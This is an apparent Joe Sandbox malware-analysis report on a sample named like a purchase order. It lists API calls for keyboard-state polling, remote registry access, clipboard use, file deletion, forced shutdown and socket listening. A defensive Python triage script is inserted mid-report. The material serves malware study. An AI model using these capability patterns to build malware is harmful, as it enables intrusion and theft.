                                                                    • Opcode ID: 2c0bf8b1a6f388dd16fb709e70b49056bf5444da8c24333efd57fc45b81a44f1
                                                                    • Instruction ID: 2b8769ccf6cd5dc1a5c81dc2d2f2f37c5c4b0d775384f8cf0e68cbc1b8f50bc1
                                                                    • Opcode Fuzzy Hash: 2c0bf8b1a6f388dd16fb709e70b49056bf5444da8c24333efd57fc45b81a44f1
                                                                    • Instruction Fuzzy Hash: 0D729375E00229CBDF24CF59D8807AEB7B5FF44310F18816AE816EB690DB309E81DB90
                                                                    APIs
                                                                    • GetKeyboardState.USER32(?), ref: 00C70097
                                                                    • SetKeyboardState.USER32(?), ref: 00C70102
                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00C70122
                                                                    • GetKeyState.USER32(000000A0), ref: 00C70139
                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00C70168
                                                                    • GetKeyState.USER32(000000A1), ref: 00C70179
                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00C701A5
                                                                    • GetKeyState.USER32(00000011), ref: 00C701B3
                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00C701DC
                                                                    • GetKeyState.USER32(00000012), ref: 00C701EA
                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00C70213
                                                                    • GetKeyState.USER32(0000005B), ref: 00C70221
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: State$Async$Keyboard
                                                                    • String ID:
                                                                    • API String ID: 541375521-0
                                                                    • Opcode ID: 1b35fb8971482fd8a7603812848adb11f77eef5c330ea3fb402bacfdb2aef2ca
                                                                    • Instruction ID: 9c33aa253cf5de62d2a507ccad2706161718b8885957b115b4978452b1f624bb
                                                                    • Opcode Fuzzy Hash: 1b35fb8971482fd8a7603812848adb11f77eef5c330ea3fb402bacfdb2aef2ca
                                                                    • Instruction Fuzzy Hash: FD511C30904388A9FB35DBB088557EEBFB49F01380F58C59ED9DA561C3DAA49B8CC761
                                                                    APIs
                                                                      • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C904AC
                                                                      • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
                                                                      • Part of subcall function 00C19837: __swprintf.LIBCMT ref: 00C198AC
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C9054B
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C905E3
                                                                    • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00C90822
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00C9082F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 1240663315-0
                                                                    • Opcode ID: f32ed2fba6f58c0d2b52bdbd613557ab0292f60709100ca840d060d7d7c60620
                                                                    • Instruction ID: d62c31c59639c07070e798e71a2cd469b87051a57050ad25fcff7533c89343d6
                                                                    • Opcode Fuzzy Hash: f32ed2fba6f58c0d2b52bdbd613557ab0292f60709100ca840d060d7d7c60620
                                                                    • Instruction Fuzzy Hash: D0E15E31204214AFCB14DF24C895E6ABBF8EF89314F14856DF85ADB2A2DB30ED41DB91
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: 407ab508c16f9f10058aaed65f506d0bcd8af4ae9f0a037fbdb1ed65d2309a05
                                                                    • Instruction ID: ef64fc2ee9a83592f7400b3c45776aa1c88eec94a25a0ffa927fe72b205f8741
                                                                    • Opcode Fuzzy Hash: 407ab508c16f9f10058aaed65f506d0bcd8af4ae9f0a037fbdb1ed65d2309a05
                                                                    • Instruction Fuzzy Hash: 8021C1352006119FEB14AF24EC5DBAE7BA8FF05715F10802AF946DB2B1DB30AD42DB58
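The function records above are only useful in bulk if they can be read by a script: the keyboard-state record lists GetAsyncKeyState/GetKeyState with raw virtual-key codes, the clipboard record carries no API bullets at all and is identifiable only through its "API ID" field, and the registry record mixes top-level calls with "Part of subcall function" entries. The helper below, an added example that is not Joe Sandbox code, parses both fields, decodes the virtual-key arguments to their VK_* names and tags each record with a capability. The reading of "API ID" as "$"-separated groups of CamelCase name fragments, the VK_NAMES table and the capability rules are this example's own assumptions; the sample inputs are bullets and "API ID" values copied from the keyboard, clipboard and registry records above.

```python
"""Triage helper for the per-function records in this Joe Sandbox report: parse the
'APIs' bullets and the 'API ID' similarity field, decode the virtual-key arguments
and tag each record with the capability it implies. Added example, not Joe Sandbox
code; the capability rules and the reading of 'API ID' are this example's own."""
import re
from dataclasses import dataclass, field

# One "APIs" bullet, e.g. "• GetAsyncKeyState.USER32(000000A0), ref: 00C70122" or
# "  • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[\w@$?]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
# Assumed layout of "API ID": '$'-separated groups of CamelCase name fragments;
# CRT names keep their leading underscores ("...Upper__itow__swprintf").
TOKEN = re.compile(r"_+[a-z0-9]+|[A-Z][a-z0-9]*")
KEY_STATE_APIS = {"GetAsyncKeyState", "GetKeyState"}
VK_NAMES = {0x10: "VK_SHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN", 0x5C: "VK_RWIN",
            0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0xA2: "VK_LCONTROL", 0xA3: "VK_RCONTROL"}
# Capability rules (this example's own): tag -> fragments that must all occur in the record.
RULES = {
    "keyboard-state-polling": {"Async", "State"},
    "clipboard-access": {"Clipboard"},
    "remote-registry": {"Connect", "Registry"},
    "privilege-adjustment": {"Adjust", "Token", "Privileges"},
    "system-shutdown": {"Exit", "Windows"},
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list       # ints for recovered hex values, "?" where the sandbox recovered nothing
    ref: int         # call-site address in the dump
    subcall: object  # parent function address when reported via "Part of subcall function"

@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    api_id_tokens: set = field(default_factory=set)

def _arg(tok: str):
    tok = tok.strip()
    try:
        return int(tok, 16)
    except ValueError:
        return tok

def parse_api_lines(text: str) -> list:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # blank line or not an API bullet
        args = [_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

def parse_api_id(api_id: str) -> set:
    return {t for group in api_id.split("$") for t in TOKEN.findall(group)}

def build_record(api_lines: str, api_id: str) -> FunctionRecord:
    return FunctionRecord(parse_api_lines(api_lines), parse_api_id(api_id))

def capabilities(rec: FunctionRecord) -> list:
    toks = set(rec.api_id_tokens)
    for c in rec.calls:
        toks.update(TOKEN.findall(c.name))  # API names split into the same fragments
    return sorted(tag for tag, need in RULES.items() if need <= toks)

def polled_keys(rec: FunctionRecord) -> list:
    """Distinct virtual keys passed to GetAsyncKeyState/GetKeyState, in call order."""
    keys = []
    for c in rec.calls:
        if c.name in KEY_STATE_APIS and c.args and isinstance(c.args[0], int):
            vk = VK_NAMES.get(c.args[0], f"VK_0x{c.args[0]:02X}")
            if vk not in keys:
                keys.append(vk)
    return keys

# Constructed input: bullets and "API ID" fields copied from three records of this report.
KEYBOARD = build_record("""
• GetAsyncKeyState.USER32(000000A0), ref: 00C70122
• GetKeyState.USER32(000000A0), ref: 00C70139
• GetAsyncKeyState.USER32(000000A1), ref: 00C70168
• GetAsyncKeyState.USER32(00000011), ref: 00C701A5
• GetAsyncKeyState.USER32(00000012), ref: 00C701DC
• GetAsyncKeyState.USER32(0000005B), ref: 00C70213
""", "State$Async$Keyboard")
CLIPBOARD = build_record("", "Clipboard$AllocCloseEmptyGlobalOpen")  # record lists no bullets
REGISTRY = build_record("""
  • Part of subcall function 00C90E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C8FDAD,?,?), ref: 00C90E31
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C904AC
  • Part of subcall function 00C19837: __itow.LIBCMT ref: 00C19862
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C9054B
""", "CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf")

if __name__ == "__main__":
    for label, rec in (("keyboard", KEYBOARD), ("clipboard", CLIPBOARD), ("registry", REGISTRY)):
        print(f"{label}: {capabilities(rec)} keys={polled_keys(rec)}")
```

With these rules the keyboard record resolves to five modifier keys only (left and right Shift, Ctrl, Alt, left Win) and no character keys, which is worth knowing before labelling the function a keylogger; the capability tags are a triage starting point rather than a verdict, and the rule table is deliberately small so it can be extended with the fragments that matter for a given campaign.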
                                                                    APIs
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                      • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C738A3
                                                                    • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00C7394B
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00C7395E
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00C7397B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C7399D
                                                                    • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00C739B9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 4002782344-1173974218
                                                                    • Opcode ID: 7c4523257cf51013da749aec5ff8f5d987deaba718186743518ec8b302748035
                                                                    • Instruction ID: bf65a899d5ecade7e9b1833911a7876bdd41af337a6daa7033ae4f9c58d4c6dc
                                                                    • Opcode Fuzzy Hash: 7c4523257cf51013da749aec5ff8f5d987deaba718186743518ec8b302748035
                                                                    • Instruction Fuzzy Hash: FB518E3180518CEACF05EBA0D9929EDB779AF15300F608169F41AB7191EF316F4AFB61
                                                                    APIs
                                                                      • Part of subcall function 00C17DE1: _memmove.LIBCMT ref: 00C17E22
                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00C7F440
                                                                    • Sleep.KERNEL32(0000000A), ref: 00C7F470
                                                                    • _wcscmp.LIBCMT ref: 00C7F484
                                                                    • _wcscmp.LIBCMT ref: 00C7F49F
                                                                    • FindNextFileW.KERNEL32(?,?), ref: 00C7F53D
                                                                    • FindClose.KERNEL32(00000000), ref: 00C7F553
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                    • String ID: *.*
                                                                    • API String ID: 713712311-438819550
                                                                    • Opcode ID: c226064690212fbf00d7f2815a8cc248dff01788958924b3dd792f5e19a7849f
                                                                    • Instruction ID: 2f45c2fcb38b6252fc2b93efc5e5c8080cf79afa2020127724f4ccb1f59c7966
                                                                    • Opcode Fuzzy Hash: c226064690212fbf00d7f2815a8cc248dff01788958924b3dd792f5e19a7849f
                                                                    • Instruction Fuzzy Hash: F341517190021D9FCF54DF64DC89AEEBBB4FF05314F14856AE829A3191DB309A86EB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove
                                                                    • String ID:
                                                                    • API String ID: 4104443479-0
                                                                    • Opcode ID: 522998ea52af0e300c8b4187917a38884dddb6065a2189614b00da5c76b7e019
                                                                    • Instruction ID: 53f9bb03c8bff162a031cece1b40f345e199ad600faa7d34cc8a4c6b1882a2af
                                                                    • Opcode Fuzzy Hash: 522998ea52af0e300c8b4187917a38884dddb6065a2189614b00da5c76b7e019
                                                                    • Instruction Fuzzy Hash: 5C129870A00619EFDF14DFA5D981AEEB3F5FF48300F204529E846A7290EB36AE55DB50
                                                                    APIs
                                                                      • Part of subcall function 00C14750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C14743,?,?,00C137AE,?), ref: 00C14770
                                                                      • Part of subcall function 00C74A31: GetFileAttributesW.KERNEL32(?,00C7370B), ref: 00C74A32
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C73B89
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C73BD9
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C73BEA
                                                                    • FindClose.KERNEL32(00000000), ref: 00C73C01
                                                                    • FindClose.KERNEL32(00000000), ref: 00C73C0A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 2649000838-1173974218
                                                                    • Opcode ID: 5aabbb6feaea912b73c7bcd195ca169e53a82b4db09b132ea67ab53a3325734d
                                                                    • Instruction ID: 34f6dbe9be4e850be837568582e7a9c1db98ab8d714c405d6086a13fd2f39a49
                                                                    • Opcode Fuzzy Hash: 5aabbb6feaea912b73c7bcd195ca169e53a82b4db09b132ea67ab53a3325734d
                                                                    • Instruction Fuzzy Hash: 6C318231008385DBC301EF24C8959EFB7A8BE96314F444E2DF4E992191EB25DA09F793
                                                                    APIs
                                                                      • Part of subcall function 00C687E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C6882B
                                                                      • Part of subcall function 00C687E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C68858
                                                                      • Part of subcall function 00C687E1: GetLastError.KERNEL32 ref: 00C68865
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00C751F9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-194228
                                                                    • Opcode ID: 8dbe2a99ef90e7060e6d0d6ad31c8b1252a1973fbc486f54a91bf8a70e563409
                                                                    • Instruction ID: 15b9e679ccc3246d7228e74456c2d3aecea06c6c09d7344bd2d24385ad0acbfc
                                                                    • Opcode Fuzzy Hash: 8dbe2a99ef90e7060e6d0d6ad31c8b1252a1973fbc486f54a91bf8a70e563409
                                                                    • Instruction Fuzzy Hash: 140126317916116BF72C6368AC8EFBF725CEB05341F218525F92FE20D3EAD21D0186A0
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C862DC
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C862EB
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00C86307
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00C86316
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C86330
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00C86344
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                                                    • String ID:
                                                                    • API String ID: 1279440585-0
                                                                    • Opcode ID: e47666e7b57296cac90cc98f732bb8b3924bb709d559881eb3ba92cfac4d70b4
                                                                    • Instruction ID: 2f18e5a9fe88123a01412c715452bdac81266a0c4952f14a1049108bd3c64fb0
                                                                    • Opcode Fuzzy Hash: e47666e7b57296cac90cc98f732bb8b3924bb709d559881eb3ba92cfac4d70b4
                                                                    • Instruction Fuzzy Hash: 7D21D2306002049FDB10EF64C849BAEB7A9EF45324F148159E816E73E1C770AD41DB55
                                                                    APIs
                                                                      • Part of subcall function 00C30DB6: std::exception::exception.LIBCMT ref: 00C30DEC
                                                                      • Part of subcall function 00C30DB6: __CxxThrowException@8.LIBCMT ref: 00C30E01
                                                                    • _memmove.LIBCMT ref: 00C60258
                                                                    • _memmove.LIBCMT ref: 00C6036D
                                                                    • _memmove.LIBCMT ref: 00C60414
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1300846289-0
                                                                    • Opcode ID: 5aa83bc7fe39c34e62aa74e47c05a476691110ec1f8ef382787c6a8fa05fc880
                                                                    • Instruction ID: 038b1928d71962b580a274661fa4c4e42dfc0c23a5ef7cbd0de9df32ac57bd23
                                                                    • Opcode Fuzzy Hash: 5aa83bc7fe39c34e62aa74e47c05a476691110ec1f8ef382787c6a8fa05fc880
                                                                    • Instruction Fuzzy Hash: 8802DF70A00219DBCF14DF64D981AAFBBF5EF44300F2480A9E80AEB355EB31DA54DB91
                                                                    APIs
                                                                      • Part of subcall function 00C12612: GetWindowLongW.USER32(?,000000EB), ref: 00C12623
                                                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00C119FA
                                                                    • GetSysColor.USER32(0000000F), ref: 00C11A4E
                                                                    • SetBkColor.GDI32(?,00000000), ref: 00C11A61
                                                                      • Part of subcall function 00C11290: DefDlgProcW.USER32(?,00000020,?), ref: 00C112D8
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ColorProc$LongWindow
                                                                    • String ID:
                                                                    • API String ID: 3744519093-0
                                                                    • Opcode ID: 012eeb0cdf2109cc3ff83550ae30c40e932e8930d2d3bfc2cfc5b44fd818aabd
                                                                    • Instruction ID: 0047979ab0831e1bc62fdb4420b3276867fcbcd8df79764b38b8503d0bf9b36a
                                                                    • Opcode Fuzzy Hash: 012eeb0cdf2109cc3ff83550ae30c40e932e8930d2d3bfc2cfc5b44fd818aabd
                                                                    • Instruction Fuzzy Hash: 9DA12971116545BEEA24AA2A5C48EFF296CEF43341F1C011AFF22D51D2CA29DE81B2B5
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00C7BCE6
                                                                    • _wcscmp.LIBCMT ref: 00C7BD16
                                                                    • _wcscmp.LIBCMT ref: 00C7BD2B
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00C7BD3C
                                                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C7BD6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                                                    • String ID:
                                                                    • API String ID: 2387731787-0
                                                                    • Opcode ID: ac889798b2e254e41f1b93de089b8a7549b8c88e02ee271c4b37a4f984654a72
                                                                    • Instruction ID: 92ed7429b93e9a6d970a3841e679702d851c6f672b4b0ba18b15f3b803cc4eba
                                                                    • Opcode Fuzzy Hash: ac889798b2e254e41f1b93de089b8a7549b8c88e02ee271c4b37a4f984654a72
                                                                    • Instruction Fuzzy Hash: 1D51AD356046019FD724DF28C490FAAB3E8EF5A320F10861DF96A873A1DB30ED05DB91
                                                                    APIs
                                                                      • Part of subcall function 00C87D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C87DB6
                                                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C8679E
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C867C7
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00C86800
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00C8680D
                                                                    • closesocket.WSOCK32(00000000,00000000), ref: 00C86821
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                     • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
